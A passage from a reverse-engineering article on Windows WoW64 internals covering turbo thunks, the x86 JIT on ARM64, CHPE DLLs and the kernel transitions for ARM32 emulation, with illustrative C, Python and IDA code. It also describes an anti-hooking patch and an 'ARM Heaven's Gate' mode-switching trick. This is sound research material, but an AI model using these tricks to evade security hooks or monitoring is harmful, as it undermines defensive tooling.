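typedef struct BT_EXPORT {
    const char *Name;
    int Required;      /* 1 for the exports marked "(!)" */
    BT_PROC Address;   /* filled in by the resolver, NULL if missing */
} BT_EXPORT;

/* Stand-in for the loader's export lookup. */
typedef BT_PROC (*LOOKUP_FN)(const char *name);

/* Returns 1 if every required export was found, 0 otherwise.
   Missing optional exports are simply left as NULL. */
int resolve_translator_exports(BT_EXPORT *exports, size_t count, LOOKUP_FN lookup)
{
    for (size_t i = 0; i < count; i++) {
        exports[i].Address = lookup(exports[i].Name);
        if (exports[i].Address == NULL && exports[i].Required)
            return 0;
    }
    return 1;
}

static void mock_proc(void) {}

/* Mock translator that exports only the three mandatory functions. */
BT_PROC mock_minimal_lookup(const char *name)
{
    if (strcmp(name, "BTCpuProcessInit") == 0 ||
        strcmp(name, "BTCpuSimulate") == 0 ||
        strcmp(name, "BTCpuGetBopCode") == 0)
        return mock_proc;
    return NULL;
}

/* Mock translator that exports nothing at all. */
BT_PROC mock_empty_lookup(const char *name)
{
    (void)name;
    return NULL;
}

void example_usage(void)
{
    BT_EXPORT exports[] = {
        { "BTCpuProcessInit", 1, NULL },
        { "BTCpuProcessTerm", 0, NULL },
        { "BTCpuSimulate",    1, NULL },
        { "BTCpuGetBopCode",  1, NULL },
    };
    assert(resolve_translator_exports(exports, 4, mock_minimal_lookup) == 1);
    assert(exports[1].Address == NULL); /* optional export stays unresolved */
}
```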

At the end of the ProcessInit function, wow64!Wow64ProtectMrdata(1) is called, making .mrdata non-writable again.

wow64!ThreadInit

  • wow64!ThreadInit
    • wow64!CpuThreadInit
      • NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode()
      • emu!BTCpuThreadInit

ThreadInit does some little thread-specific initialization, such as:

  • Copying CurrentLocale and IdealProcessor values from 64-bit TEB into 32-bit TEB.
  • For non-WOW64_CPUFLAGS_SOFTWARE emulators, it calls CpuThreadInit, which:
    • Performs NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode().
    • Calls emu!BTCpuThreadInit().
  • For WOW64_CPUFLAGS_SOFTWARE emulators, it creates an event, which is added into AlertByThreadIdEventHashTable and stored in NtCurrentTeb()->TlsSlots[18]. This event is used for special emulation of NtAlertThreadByThreadId and NtWaitForAlertByThreadId.

NOTE: The WOW64_CPUFLAGS_MSFT64 (1) or the WOW64_CPUFLAGS_SOFTWARE (2) flag is stored in the NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO], in the WOW64INFO.CpuFlags field. One of these flags is always set in the emulator’s BTCpuProcessInit function (mentioned in the section above):

  • wow64cpu.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • wowarmhw.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • xtajit.dll sets WOW64_CPUFLAGS_SOFTWARE (2)

x86 on x64

Entering 32-bit mode

  • ...
  • wow64!RunCpuSimulation
    • wow64cpu!BTCpuSimulate
      • wow64cpu!RunSimulatedCode

RunSimulatedCode runs in a loop and performs transitions into 32-bit mode either via:

  • jmp fword ptr[reg]: a “far jump” that changes not only the instruction pointer (RIP), but also the code segment register (CS). The 32-bit code segment is usually 0x23, while the 64-bit code segment is 0x33
  • synthetic “machine frame” and iret: used on every “state reset”

NOTE: Explanation of segmentation and “why does it work just by changing a segment register” is beyond scope of this article. If you’d like to know more about “long mode” and segmentation, you can start here.

A far jump is used most of the time for the transition, mainly because it’s faster. iret, on the other hand, is more powerful, as it can change CS, SS, EFLAGS, RSP and RIP all at once. The “state reset” occurs when WOW64_CPURESERVED.Flags has the WOW64_CPURESERVED_FLAG_RESET_STATE (1) bit set. This happens during an exception (see wow64!Wow64PrepareForException and wow64cpu!BTCpuResetToConsistentState). Also, this flag is cleared on every iteration of the emulation loop (using btr, bit-test-and-reset).
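In C terms, the decision made on each loop iteration looks roughly like the sketch below. The TRANSITION enum and the choose_transition function are made up for this example, the width of the Flags field is an assumption, and the two separate statements only approximate what the single btr instruction does in one step.

```c
#include <assert.h>
#include <stdint.h>

#define WOW64_CPURESERVED_FLAG_RESET_STATE 1u

typedef enum TRANSITION {
    TRANSITION_FAR_JUMP, /* fast path: jmp fword ptr [reg] */
    TRANSITION_IRET      /* full state reload via a synthetic machine frame */
} TRANSITION;

/* Tests the reset-state bit and clears it, like btr does,
   then picks the transition method based on the old value. */
TRANSITION choose_transition(uint32_t *flags)
{
    int was_set = (*flags & WOW64_CPURESERVED_FLAG_RESET_STATE) != 0;
    *flags &= ~WOW64_CPURESERVED_FLAG_RESET_STATE;
    return was_set ? TRANSITION_IRET : TRANSITION_FAR_JUMP;
}

void example_usage(void)
{
    uint32_t flags = WOW64_CPURESERVED_FLAG_RESET_STATE; /* e.g. after an exception */
    assert(choose_transition(&flags) == TRANSITION_IRET);
    assert(choose_transition(&flags) == TRANSITION_FAR_JUMP); /* flag was cleared */
}
```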

[Figure: Start of the RunSimulatedCode (x64)]

You can see the simplest form of switching into the 32-bit mode. Also, at the beginning you can see that TurboThunkDispatch address is moved into the r15 register. This register stays untouched during the whole RunSimulatedCode function. Turbo thunks will be explained in more detail later.

Leaving 32-bit mode

The switch back to the 64-bit mode is very similar — it also uses far jumps. The usual situation when code wants to switch back to the 64-bit mode is upon system call:

[Figure: NtMapViewOfSection (x64)]

The Wow64SystemServiceCall is just a simple jump to the Wow64Transition:

[Figure: Wow64SystemServiceCall (x64)]

If you remember, the Wow64Transition value is resolved by the wow64cpu!BTCpuGetBopCode function:

[Figure: BTCpuGetBopCode - wow64cpu.dll (x64)]

It selects either KiFastSystemCall or KiFastSystemCall2 based on the CpupSystemCallFast value.

The KiFastSystemCall looks like this (used when CpupSystemCallFast != 0):

  • [x86] jmp 33h:$+9 (jumps to the instruction below)
  • [x64] jmp qword ptr [r15+offset] (which points to CpupReturnFromSimulatedCode)

The KiFastSystemCall2 looks like this (used when CpupSystemCallFast == 0):

  • [x86] push 0x33
  • [x86] push eax
  • [x86] call $+5
  • [x86] pop eax
  • [x86] add eax, 12
  • [x86] xchg eax, dword ptr [esp]
  • [x86] jmp fword ptr [esp] (jumps to the instruction below)
  • [x64] add rsp, 8
  • [x64] jmp wow64cpu!CpupReturnFromSimulatedCode

Clearly, KiFastSystemCall is faster, so why isn’t it used every time?

It turns out that CpupSystemCallFast is set to 1 in the wow64cpu!BTCpuProcessInit function if the process is not executed with the ProhibitDynamicCode mitigation policy and if NtProtectVirtualMemory(&KiFastSystemCall, PAGE_EXECUTE_READ) succeeds.

This is because KiFastSystemCall is in a non-executable read-only section (W64SVC), while KiFastSystemCall2 is in a read-executable section (WOW64SVC).

But the actual reason why KiFastSystemCall is in a non-executable section by default and needs to be made executable manually is, honestly, unknown to me. My guess would be that it has something to do with relocations, because the address in the jmp 33h:$+9 instruction must be somehow resolved by the loader. But maybe I’m wrong. Let me know if you know the answer!

Turbo thunks

I hope you didn’t forget about the TurboThunkDispatch address hanging in the r15 register. This value is used as a jump-table:

[Figure: TurboThunkDispatch (x64)]

There are 32 items in the jump-table.

[Figure: TurboDispatchJumpAddressStart (x64)]

CpupReturnFromSimulatedCode is the first code that is always executed in the 64-bit mode when 32-bit to 64-bit transition occurs. Let’s recapitulate the code:

  • The stack is swapped
  • Non-volatile registers are saved
  • eax, which contains the encoded service table index and system call number, is moved into ecx
  • Its high word is acquired via ecx >> 16
  • The result is used as an index into the TurboThunkDispatch jump-table

You might be confused now, because few sections above we’ve defined the service number like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
    USHORT SystemCallNumber : 12;
    USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

…therefore, after right-shifting this value by 16 bits we should always get 0, right?

It turns out, on x64, the WOW64_SYSTEM_SERVICE might be defined like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
    ULONG SystemCallNumber  : 12;
    ULONG ServiceTableIndex :  4;
    ULONG TurboThunkNumber  :  5; // Can hold values 0 to 31
    ULONG AlwaysZero        : 11;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

Let’s examine a few WoW64 system calls:

NtMapViewOfSection (x64)
NtWaitForSingleObject (x64)
NtDeviceIoControlFile (x64)

Based on our new definition of WOW64_SYSTEM_SERVICE, we can conclude that:

  • NtMapViewOfSection uses turbo thunk with index 0 (TurboDispatchJumpAddressEnd)
  • NtWaitForSingleObject uses turbo thunk with index 13 (Thunk3ArgSpNSpNSpReloadState)
  • NtDeviceIoControlFile uses turbo thunk with index 27 (DeviceIoctlFile)
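The decoding above can be sketched in a few lines of Python. This is only an illustration of the reconstructed bit layout, assuming the bit-fields are allocated from the least significant bit (which is consistent with the ecx >> 16 shift). The class and function names are made up for this example, and 0x000D0004 is the value that the NtWaitForSingleObject stub loads into eax.

```python
from typing import NamedTuple


class Wow64SystemService(NamedTuple):
    system_call_number: int   # bits 0-11
    service_table_index: int  # bits 12-15
    turbo_thunk_number: int   # bits 16-20


def decode_service(eax: int) -> Wow64SystemService:
    """Split the 32-bit value that a WoW64 system call stub loads into eax."""
    return Wow64SystemService(
        system_call_number=eax & 0xFFF,
        service_table_index=(eax >> 12) & 0xF,
        turbo_thunk_number=(eax >> 16) & 0x1F,
    )


# NtWaitForSingleObject stub: mov eax, 0D0004h
service = decode_service(0x000D0004)
print(service.system_call_number, service.service_table_index, service.turbo_thunk_number)
```

A value whose high word is 0 decodes to turbo thunk 0, which is the TurboDispatchJumpAddressEnd case.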

Let’s finally explain “turbo thunks” properly.

Turbo thunks are an optimization of the WoW64 subsystem, specifically on Windows x64, that lets particular system calls never leave wow64cpu.dll: the conversion of parameters and return value, and the syscall instruction itself, are performed entirely there. The set of functions that use turbo thunks reveals that they are usually very simple in terms of parameter conversion: they receive numerical values or handles.

The notation of Thunk* labels is as follows:

  • The number specifies how many arguments the function receives
  • Sp converts parameter with sign-extension
  • NSp converts parameter without sign-extension
  • ReloadState will return to the 32-bit mode using iret instead of far jump, if WOW64_CPURESERVED_FLAG_RESET_STATE is set
  • QuerySystemTime, ReadWriteFile, DeviceIoctlFile, … are special cases

Let’s take the NtWaitForSingleObject and its turbo thunk Thunk3ArgSpNSpNSpReloadState as an example:

  • it receives 3 parameters
  • 1st parameter is sign-extended
  • 2nd parameter isn’t sign-extended
  • 3rd parameter isn’t sign-extended
  • it can switch to 32-bit mode using iret if WOW64_CPURESERVED_FLAG_RESET_STATE is set
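To make the naming convention concrete, here is a small Python sketch that splits a generic Thunk* label into its parts. The parser and its output format are purely illustrative; they only encode the notation described above and say nothing about how wow64cpu.dll is actually built.

```python
import re

# Thunk<N>Arg, then a run of Sp/NSp markers, then an optional ReloadState suffix.
_THUNK_RE = re.compile(r"^Thunk(\d+)Arg((?:NSp|Sp)*)(ReloadState)?$")


def parse_thunk_label(label: str) -> dict:
    """Decode a generic Thunk* label according to the notation above."""
    match = _THUNK_RE.match(label)
    if match is None:
        # Special cases such as DeviceIoctlFile do not follow the pattern.
        raise ValueError(f"not a generic Thunk* label: {label!r}")
    conversions = re.findall(r"NSp|Sp", match.group(2))
    return {
        "arg_count": int(match.group(1)),
        # True means the parameter is sign-extended, False means it is not.
        "sign_extend": [c == "Sp" for c in conversions],
        "reload_state": match.group(3) is not None,
    }


print(parse_thunk_label("Thunk3ArgSpNSpNSpReloadState"))
```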

When we cross-check this information with its function prototype, it makes sense:

NTSTATUS
NTAPI
NtWaitForSingleObject(
    _In_ HANDLE Handle,
    _In_ BOOLEAN Alertable,
    _In_ PLARGE_INTEGER Timeout
    );

The sign-extension of HANDLE makes sense, because if we pass there an INVALID_HANDLE_VALUE, which happens to be 0xFFFFFFFF (-1) on 32-bits, we don’t want to convert this value to 0x00000000FFFFFFFF, but 0xFFFFFFFFFFFFFFFF.
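The difference between the two conversions is easy to check numerically. The following Python sketch (helper names are made up for this example) widens a 32-bit value both ways:

```python
def zero_extend_32_to_64(value: int) -> int:
    """NSp-style conversion: the upper 32 bits become zero."""
    return value & 0xFFFFFFFF


def sign_extend_32_to_64(value: int) -> int:
    """Sp-style conversion: bit 31 is copied into the upper 32 bits."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        value |= 0xFFFFFFFF00000000
    return value


invalid_handle_32 = 0xFFFFFFFF  # INVALID_HANDLE_VALUE as seen by 32-bit code
print(hex(zero_extend_32_to_64(invalid_handle_32)))
print(hex(sign_extend_32_to_64(invalid_handle_32)))
```

Only the sign-extended result matches the 64-bit INVALID_HANDLE_VALUE; for values with bit 31 clear, both conversions give the same result.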

On the other hand, if the TurboThunkNumber is 0, the call ends up in TurboDispatchJumpAddressEnd, which in turn calls wow64!Wow64SystemServiceEx. You can consider this case the “slow path”.

Disabling Turbo thunks

On Windows x64, the Turbo thunk optimization can actually be disabled!

In one of the previous sections I talked about the ntdll32!NtWow64CallFunction64 and wow64!Wow64CallFunctionTurboThunkControl functions. As with any other NtWow64* function, NtWow64CallFunction64 is only available in the WoW64 ntdll.dll. This function can be called with an index of a WoW64 function in the Wow64FunctionDispatch64 table (shown earlier).

The function prototype might look like this:

typedef enum _WOW64_FUNCTION {
    Wow64Function64Nop,
    Wow64FunctionQueryProcessDebugInfo,
    Wow64FunctionTurboThunkControl,
    Wow64FunctionCfgDispatchControl,
    Wow64FunctionOptimizeChpeImportThunks,
} WOW64_FUNCTION;

NTSYSCALLAPI
NTSTATUS
NTAPI
NtWow64CallFunction64(
    _In_ WOW64_FUNCTION Wow64Function,
    _In_ ULONG Flags,
    _In_ ULONG InputBufferLength,
    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG OutputBufferLength,
    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
    _Out_opt_ PULONG ReturnLength
    );

NOTE: This function prototype has been reconstructed with the help of the wow64!Wow64CallFunction64Nop function code, which just logs the parameters.

We can see that wow64!Wow64CallFunctionTurboThunkControl can be called with an index of 2. This function performs some sanity checks and then calls wow64cpu!BTCpuTurboThunkControl(*(ULONG*)InputBuffer).

wow64cpu!BTCpuTurboThunkControl then checks the input parameter.

  • If it’s 0, it patches every target of the jump table to point to TurboDispatchJumpAddressEnd (remember, this is the target that is called when WOW64_SYSTEM_SERVICE.TurboThunkNumber is 0).
  • If it’s non-0, it returns STATUS_NOT_SUPPORTED.

This means 2 things:

  • Calling wow64cpu!BTCpuTurboThunkControl(0) disables the Turbo thunks, and every system call ends up taking the “slow path”.
  • It is not possible to enable them back.
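The effect on the dispatch can be modelled with a toy jump table. The Python sketch below is not the real implementation: the class, its methods and most handler names are placeholders, and only the behaviour described above (32 entries, index taken from eax >> 16, a one-way switch) is taken from the text. The index is additionally masked to 5 bits here so the model cannot run out of the table.

```python
STATUS_SUCCESS = 0x00000000
STATUS_NOT_SUPPORTED = 0xC00000BB


class TurboThunkTable:
    """Toy model of the 32-entry TurboThunkDispatch jump table."""

    def __init__(self, handlers):
        if len(handlers) != 32:
            raise ValueError("the jump table has exactly 32 entries")
        self.entries = list(handlers)

    def dispatch(self, eax: int):
        # The high word of eax selects the thunk.
        return self.entries[(eax >> 16) & 0x1F]

    def turbo_thunk_control(self, enable: int) -> int:
        if enable != 0:
            return STATUS_NOT_SUPPORTED
        # Point every entry at entry 0, i.e. the slow path.
        self.entries = [self.entries[0]] * len(self.entries)
        return STATUS_SUCCESS


handlers = [f"PlaceholderThunk{i}" for i in range(32)]  # placeholder names
handlers[0] = "TurboDispatchJumpAddressEnd"
handlers[13] = "Thunk3ArgSpNSpNSpReloadState"
table = TurboThunkTable(handlers)

print(table.dispatch(0x000D0004))   # fast path before disabling
table.turbo_thunk_control(0)
print(table.dispatch(0x000D0004))   # slow path afterwards
```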

With all this in mind, we can achieve disabling Turbo thunks by this call:

#define WOW64_TURBO_THUNK_DISABLE 0
#define WOW64_TURBO_THUNK_ENABLE  1 // STATUS_NOT_SUPPORTED 🙁

ULONG ThunkInput = WOW64_TURBO_THUNK_DISABLE;
NTSTATUS Status;

Status = NtWow64CallFunction64(Wow64FunctionTurboThunkControl,
                               0,
                               sizeof(ThunkInput),
                               &ThunkInput,
                               0,
                               NULL,
                               NULL);

What might it be good for? I can think of 3 possible use-cases:

  • If we deploy custom wow64log.dll (explained earlier), disabling Turbo thunks guarantees that we will see every WoW64 system call in our wow64log!Wow64LogSystemService callback. We wouldn’t see such calls if the Turbo thunks were enabled, because they would take the “fast path” inside of the wow64cpu.dll where the syscall would be executed.
  • If we decide to hook Nt* functions in the native ntdll.dll, disabling Turbo thunks guarantees that for each Nt* function called in the ntdll32.dll, the corresponding Nt* function will be called in the native ntdll.dll. (This is basically the same point as the previous one.)

    NOTE: Keep in mind that this only applies to system calls, i.e. to Nt* or Zw* functions. Other functions are not forwarded from the 32-bit ntdll.dll to the 64-bit ntdll.dll. For example, if we hooked RtlDecompressBuffer in the native ntdll.dll of the WoW64 process, it wouldn’t be called on an ntdll32!RtlDecompressBuffer call. This is because the full implementation of the Rtl* functions is already in the ntdll32.dll.

  • We can “harmlessly” patch the high word moved to eax in every WoW64 system call stub to 0. For example, in NtWaitForSingleObject there is mov eax, 0D0004h. If we patched the appropriate 2 bytes in that instruction so that it became mov eax, 4h, the system call would still work. This approach can be used as an anti-hooking technique: if there’s a jump at the start of the function, the patch will break it. If there’s not a jump, we just disable the Turbo thunk for this function.
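The byte-level patch from the last point can be sketched offline in Python. This is only an illustration on a byte string, assuming the stub begins with the 5-byte mov eax, imm32 encoding (opcode B8 followed by a little-endian immediate); the function name is made up. Unlike the blind patch described above, this sketch refuses to touch a stub that starts with anything else.

```python
def clear_turbo_thunk(stub: bytes) -> bytes:
    """Zero the high word of the immediate in a leading `mov eax, imm32`."""
    if len(stub) < 5 or stub[0] != 0xB8:
        raise ValueError("stub does not start with mov eax, imm32")
    patched = bytearray(stub)
    # The immediate is little-endian, so bytes 3 and 4 hold its high word.
    patched[3:5] = b"\x00\x00"
    return bytes(patched)


original = bytes.fromhex("b804000d00")  # mov eax, 0D0004h
print(clear_turbo_thunk(original).hex())  # encoding of mov eax, 4h
```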

x86 on ARM64

Emulation of x86 applications on ARM64 is handled by actual binary translation. Instead of wow64cpu.dll, xtajit.dll (probably short for “x86 to ARM64 JIT”) is used for the emulation. As with other emulation DLLs, this DLL is native (ARM64).

The x86 emulation on Windows ARM64 also consists of other “XTA” components:

  • xtac.exe — XTA Compiler
  • XtaCache.exe — XTA Cache Service

Execution of x86 programs on ARM64 appears to go way beyond just emulation. It is also capable of caching already binary-translated code, so that the next execution of the same application should be faster. This cache is located in the Windows\XtaCache directory, which contains files named in the format FILENAME.EXT.HASH1.HASH2.mp.N.jc. These files are then mapped into the user-mode address space of the application. If you’re asking whether you can find actual ARM64 code in these files: indeed, you can.
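If you want to group cache files by module, the naming scheme can be split from the right-hand side. The Python sketch below assumes nothing beyond the FILENAME.EXT.HASH1.HASH2.mp.N.jc pattern; the helper names and the sample file name are invented for illustration, and the meaning of the two hashes is not interpreted.

```python
from typing import NamedTuple


class XtaCacheName(NamedTuple):
    module: str  # FILENAME.EXT
    hash1: str
    hash2: str
    index: str   # the N component


def parse_xta_cache_name(name: str) -> XtaCacheName:
    # Split from the right so that dots inside FILENAME.EXT are preserved.
    parts = name.rsplit(".", 5)
    if len(parts) != 6 or parts[3].lower() != "mp" or parts[5].lower() != "jc":
        raise ValueError(f"unexpected cache file name: {name!r}")
    module, hash1, hash2, _mp, index, _jc = parts
    return XtaCacheName(module, hash1, hash2, index)


# Hypothetical file name, for illustration only.
print(parse_xta_cache_name("EXAMPLE.DLL.0123ABCD.4567EF01.mp.1.jc"))
```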

The whole “XTA” and its internals are not in the focus of this article, but they would definitely deserve a separate article.

Unfortunately, Microsoft doesn’t provide symbols for any of these xta* DLLs or executables. But if you’re feeling adventurous, you can find some interesting artifacts, like this array of structures inside xtajit.dll, which contains the name of each function and a pointer to it. There are thousands of items in this array:

BT functions (before) (ARM64)

With a simple Python script, we can mass-rename all functions referenced in this array:

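import idc

# Bounds of the array in the analyzed build of xtajit.dll.
begin = 0x01800A8C20
end = 0x01800B7B4F
struct_size = 24

ea = begin
while ea < end:
    # Advance first: the slot at `begin` itself is not processed.
    ea += struct_size

    # First qword: pointer to the name; second qword: function address.
    name = idc.GetString(idc.Qword(ea))
    idc.MakeName(idc.Qword(ea + 8), name)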

I’d like to thank Milan Boháček for providing me this script.

BT functions (after) (ARM64)
BT translated function list (ARM64)

Windows\SyCHPE32 & Windows\SysWOW64

One thing you can observe on ARM64 is that it contains two folders used for x86 emulation. The difference between them is that SyCHPE32 contains a small subset of DLLs that are frequently used by applications, while the contents of the SysWOW64 folder are nearly identical to the contents of this folder on Windows x64.

The CHPE DLLs are neither pure x86 DLLs nor pure ARM64 DLLs. They are “compiled-hybrid-PE”s. What does that mean? Let’s see:

NtMapViewOfSection (CHPE) (ARM64)

After opening SyCHPE32\ntdll.dll, IDA will first tell us, unsurprisingly, that it cannot download the PDB for this DLL. Looking at a randomly chosen Nt* function, we can see that it doesn’t differ from what we would see in SysWOW64\ntdll.dll. Let’s look at some non-Nt* function:

RtlDecompressBuffer (CHPE) (ARM64)

We can see it contains a regular x86 function prologue, immediately followed by an x86 function epilogue and then a jump to a location that appears to contain just garbage.

My guess is that the reason for this prologue is compatibility with applications that check whether particular functions are hooked by checking whether the first bytes of the function contain a real prologue.

NOTE: Again, if you’re feeling adventurous, you can patch the FileHeader.Machine field in the PE header to IMAGE_FILE_MACHINE_ARM64 (0xAA64) and open this file in IDA. You will see a whole lot of correctly resolved ARM64 functions. Again, I’d like to thank Milan Boháček for this tip.
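A minimal Python sketch of that patch follows. It relies only on the standard PE layout (e_lfanew at offset 0x3C of the DOS header, the 4-byte “PE\0\0” signature, then the 2-byte Machine field); the function name is made up, and the sketch works on an in-memory copy rather than on the DLL itself.

```python
import struct

IMAGE_FILE_MACHINE_ARM64 = 0xAA64


def patch_machine(image: bytes, machine: int = IMAGE_FILE_MACHINE_ARM64) -> bytes:
    """Return a copy of a PE image with FileHeader.Machine replaced."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    patched = bytearray(image)
    # FileHeader.Machine immediately follows the 4-byte PE signature.
    struct.pack_into("<H", patched, e_lfanew + 4, machine)
    return bytes(patched)
```

Typical use would be to read a copy of the DLL from SyCHPE32, pass its bytes through patch_machine and write the result to a new file that is then opened in IDA.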

If your question is “how are these images generated?”, I would answer that I don’t know, but my bet would be on some internal version of Microsoft’s C++ compiler toolchain. This idea appears to be supported by various occurrences of the CHPE keyword in the ChakraCore codebase.

ARM32 on ARM64

The loop inside of the wowarmhw!BTCpuSimulate is fairly simple compared to wow64cpu.dll loop:

DECLSPEC_NORETURN
VOID
BTCpuSimulate(
    VOID
    )
{
    NTSTATUS Status;
    PCONTEXT Context;

    //
    // Gets WoW64 CONTEXT structure (ARM32) using
    // the RtlWow64GetCurrentCpuArea() function.
    //
    Status = CpupGetArmContext(&Context, NULL);

    if (!NT_SUCCESS(Status))
    {
        RtlRaiseStatus(Status);

        //
        // UNREACHABLE
        //
        return;
    }

    for (;;)
    {
        //
        // Switch to ARM32 mode and run the emulation.
        //
        NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = TRUE;
        CpupSwitchTo32Bit(Context);
        NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = FALSE;

        //
        // When we get here, it means ARM32 code performed a system call.
        // Advance instruction pointer to skip the "UND 0F8h" instruction.
        //
        Context->Pc += 2;

        //
        // Set LSB (least significant bit) if ARM32 is executing in
        // Thumb mode.
        //
        if (Context->Cpsr & 0x20) {
            Context->Pc |= 1;
        }

        //
        // Let wow64.dll emulate the system call. R12 has the system call
        // number, Sp points to the stack which contains the system call
        // arguments.
        //
        Context->R0 = Wow64SystemServiceEx(Context->R12, Context->Sp);
    }
}

CpupSwitchTo32Bit does nothing more than save the whole CONTEXT, perform the SVC 0xFFFF instruction, and then restore the CONTEXT.
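The program-counter fix-up performed by the loop can be checked in isolation. The following Python sketch mirrors just those two steps; the function and constant names are made up, and 0x20 is the Thumb (T) bit of the CPSR, as used in the loop above.

```python
CPSR_THUMB_BIT = 0x20  # T bit of the ARM32 CPSR


def resume_pc_after_syscall(pc: int, cpsr: int) -> int:
    """Compute the ARM32 Pc at which emulation resumes after a system call."""
    pc += 2  # skip the 2-byte UND 0F8h instruction
    if cpsr & CPSR_THUMB_BIT:
        pc |= 1  # a set LSB marks the address as Thumb code
    return pc


print(hex(resume_pc_after_syscall(0x1000, CPSR_THUMB_BIT)))
print(hex(resume_pc_after_syscall(0x1000, 0)))
```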

nt!KiEnter32BitMode / SVC 0xFFFF

I won’t be explaining here how system call dispatching works in the ntoskrnl.exe — Bruce Dang already did an excellent job doing it. This section is a follow up on his article, though.

The SVC instruction is roughly the ARM64 equivalent of the SYSCALL instruction: it basically enters kernel mode. But there is a small difference between SYSCALL and SVC: while on Windows x64 the system call number is moved into the eax register, on ARM64 the system call number can be encoded directly into the SVC instruction.

SVC 0xFFFF (ARM64)

Let’s peek for a moment into the kernel to see how this SVC instruction is handled:

  • nt!KiUserExceptionHandler
    • nt!KiEnter32BitMode
KiUserExceptionHandler (ARM64)
KiEnter32BitMode (ARM64)

We can see that:

  • MRS X30, ELR_EL1: the current interrupt-return address (stored in the ELR_EL1 system register) is moved to the register X30 (the link register, LR).
  • MSR ELR_EL1, X15: the interrupt-return address is replaced by the value in the register X15 (which is aliased to the instruction pointer register, PC, in 32-bit mode).
  • ORR X16, X16, #0b10000: bit [4] is set in X16, which is later moved to the SPSR_EL1 register. Setting this bit switches the execution mode to 32-bit.

Simply said, the X15 register holds the address that will be executed once we leave kernel mode and enter user mode, which happens with the ERET instruction at the end.

nt!KiExit32BitMode / UND #0xF8

Alright, we’re in the 32-bit ARM mode now, so how exactly do we leave? Windows solves this transition via the UND instruction, which is similar to the UD2 instruction on Intel CPUs. If you’re not familiar with it, you just need to know that it is an instruction that is basically guaranteed to raise an “invalid instruction” exception, which the OS kernel can handle. It is a defined “undefined instruction”. Again, there is a difference between UND and UD2, in that on ARM any 1-byte immediate value can be encoded directly in the instruction.

Let’s look at the NtMapViewOfSection system call in the SysArm32\ntdll.dll:

NtMapViewOfSection (ARM64)

Let’s peek into the kernel again:

  • nt!KiUser32ExceptionHandler
    • nt!KiFetchOpcodeAndEmulate
      • nt!KiExit32BitMode
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

Keep in mind that while the 32-bit code is running, it cannot modify the value of the previously stored X30 register, because it is not visible in 32-bit mode. It stays there the whole time. Upon UND #0xF8 execution, the following happens:

  • the KiFetchOpcodeAndEmulate function moves the value of X30 into the X24 register (not shown on the screenshot).
  • AND X19, X16, #0xFFFFFFFFFFFFFFC0: bit [4] (among others) is cleared in the X19 register, which is later moved to the SPSR_EL1 register. Clearing this bit switches the execution mode back to 64-bit.
  • KiExit32BitMode then moves the value of the X24 register into the ELR_EL1 register. That means that when this function finishes its execution, the ERET brings us back to the 64-bit code, right after the SVC 0xFFFF instruction.
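The two bit operations applied to the saved program status value can be tried out on plain integers. This Python sketch uses only the immediates from the ORR and AND instructions quoted in this article; the helper names are invented, and the integer merely stands in for the value that ends up in SPSR_EL1.

```python
AARCH32_BIT = 0b10000                 # bit [4], set by ORR X16, X16, #0b10000
EXIT_MASK = 0xFFFFFFFFFFFFFFC0        # immediate of the AND, clears bits [5:0]


def enter_32bit_mode(spsr: int) -> int:
    return spsr | AARCH32_BIT


def exit_32bit_mode(spsr: int) -> int:
    return spsr & EXIT_MASK


def returns_to_32bit(spsr: int) -> bool:
    """True if an ERET with this value would resume in 32-bit mode."""
    return bool(spsr & AARCH32_BIT)


spsr = enter_32bit_mode(0)
print(returns_to_32bit(spsr))
print(returns_to_32bit(exit_32bit_mode(spsr)))
```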

NOTE: It can be noticed that Windows uses the UND instruction for several purposes. A common example is UND #0xFE, which is used as a breakpoint instruction (the equivalent of __debugbreak() / int3).

As you could spot, 3 kernel transitions are required for the emulation of a system call (SVC 0xFFFF, the system call itself, UND 0xF8). This is because on ARM there is no way to switch between 32-bit and 64-bit mode purely in user mode.

If you’re looking for “ARM Heaven’s Gate”, this is it. Put whatever function address you like into the X15 register and execute SVC 0xFFFF. The next instruction will be executed in the 32-bit ARM mode, starting at that address. When you feel you’d like to come back into 64-bit mode, simply execute UND #0xF8 and your execution will continue with the instruction right after the SVC 0xFFFF.

Appendix

////////////////////////////////////////////////////////////////////////////////
// General definitions.
////////////////////////////////////////////////////////////////////////////////
//
// Context flags.
// winnt.h (Windows SDK)
//
#define CONTEXT_i386 0x00010000L
#define CONTEXT_AMD64 0x00100000L
#define CONTEXT_ARM 0x00200000L
#define CONTEXT_ARM64 0x00400000L
//
// Machine type.
// winnt.h (Windows SDK)
//
#define IMAGE_FILE_MACHINE_TARGET_HOST 0x0001 // Useful for indicating we want to interact with the host and not a WoW guest.
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4 // ARM Thumb-2 Little-Endian
#define IMAGE_FILE_MACHINE_ARM64 0xAA64 // ARM64 Little-Endian
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 // Hybrid PE (defined in ntimage.h (WDK))
////////////////////////////////////////////////////////////////////////////////
// ntoskrnl.exe
////////////////////////////////////////////////////////////////////////////////
typedef struct _PS_NTDLL_EXPORT_ITEM {
PCSTR RoutineName;
PVOID RoutineAddress;
} PS_NTDLL_EXPORT_ITEM, *PPS_NTDLL_EXPORT_ITEM;
PS_NTDLL_EXPORT_ITEM NtdllExports[] = {
//
// 19 exports on x64
// 14 exports on ARM64
//
};
